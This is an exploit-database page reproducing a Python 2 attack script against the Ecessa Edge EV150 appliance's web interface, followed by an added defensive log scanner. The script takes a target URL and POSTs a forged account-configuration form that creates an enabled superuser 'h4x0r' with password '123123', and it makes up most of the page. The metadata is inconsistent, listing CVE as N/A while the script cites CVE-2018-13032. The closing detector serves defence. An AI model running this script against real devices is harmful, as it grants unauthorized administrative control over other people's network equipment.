Ecessa Edge EV150 Cross-Site Request Forgery (Add Superuser)
CVE: N/A
Category: CWE-352
Price: N/A
Severity: N/A
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2019-03-26
CPE: cpe:cpe:/a:ecessa:edge_ev150
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030217 Below is a copy:
#!/usr/bin/python
#Exploit Title:
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
# Written for Python 2 (print statements).
import sys
import requests

# Account-configuration form handler on the device's web interface
au='/cgi-bin/pl_web.cgi/util_configlogin_act'

def help_message():
    print """
{} -h ---> show this message
{} -u URL ---> start exploit
example: {} -u http://target.com
""".format(sys.argv[0],sys.argv[0],sys.argv[0])

def error_optiont():
    print """\ntype and enter {} -h""".format(sys.argv[0])

# Form fields of the user-accounts page; slot 4 defines a new, enabled superuser
data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'',
    'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'',
    'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'',
    'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123',
    'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked',
    'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d',
    'form_has_changed':'1','submit':'Supersize!'}

if len(sys.argv)>1 and sys.argv[1]=='-h':
    help_message()
    exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
    urlt=sys.argv[2]+au
    # Check that the form handler is reachable before submitting the form
    if '200' in str(requests.get(urlt)):
        print 'Send DATA'
        r=requests.post(urlt,data=data_fs)
        if '200' in str(r):
            print 'Added User'
    else:
        print 'Not Found Page'
else:
    print 'Type And Enter -> python {} -h'.format(sys.argv[0])
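A defender-side check for the request the script above sends, as an added example that is not part of the original listing: it scans web access logs for POSTs to the account-configuration endpoint whose Referer is missing or points at another origin, the pattern left by a forged cross-site submission (CWE-352) or a direct scripted request. It assumes a reverse proxy in front of the device that writes combined-format logs (the appliance's own log format is not shown on the page); the host name, function names and sample log lines are constructed.

```python
import re
from urllib.parse import urlparse

# Endpoint path taken from the listing; host names and log lines are constructed.
ACCOUNT_ENDPOINT = "/cgi-bin/pl_web.cgi/util_configlogin_act"

# Assumed combined log format:
# ip - user [time] "METHOD path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, device_host):
    """Return a reason string for a suspect account-form POST, else None."""
    m = LOG_RE.match(line.strip())
    if not m or m["method"] != "POST":
        return None
    if urlparse(m["path"]).path != ACCOUNT_ENDPOINT:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"            # scripted client or stripped header
    if urlparse(referer).hostname != device_host.lower():
        return "cross-origin-referer"  # form submitted from another site
    return None                        # submitted from the device's own UI

def suspicious_account_posts(lines, device_host):
    """Collect (reason, source_ip) for every flagged line, in log order."""
    hits = []
    for line in lines:
        reason = classify(line, device_host)
        if reason:
            hits.append((reason, LOG_RE.match(line.strip())["ip"]))
    return hits

SAMPLE_LOG = [  # constructed lines using documentation address ranges
    '192.0.2.10 - - [26/Mar/2019:10:01:02 +0000] "POST /cgi-bin/pl_web.cgi/util_configlogin_act HTTP/1.1" 200 512 "https://edge.example.internal/cgi-bin/pl_web.cgi/util_configlogin" "Mozilla/5.0"',
    '192.0.2.10 - - [26/Mar/2019:10:07:41 +0000] "POST /cgi-bin/pl_web.cgi/util_configlogin_act HTTP/1.1" 200 512 "https://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Mar/2019:10:09:13 +0000] "POST /cgi-bin/pl_web.cgi/util_configlogin_act HTTP/1.1" 200 512 "-" "python-requests/2.21.0"',
    '192.0.2.10 - - [26/Mar/2019:10:11:00 +0000] "GET /cgi-bin/pl_web.cgi/util_configlogin_act HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for reason, ip in suspicious_account_posts(SAMPLE_LOG, "edge.example.internal"):
        print(reason, ip)
```

Browsers and privacy tools can strip the Referer header, so a `no-referer` hit is a lead to correlate with account changes on the device rather than proof of forgery.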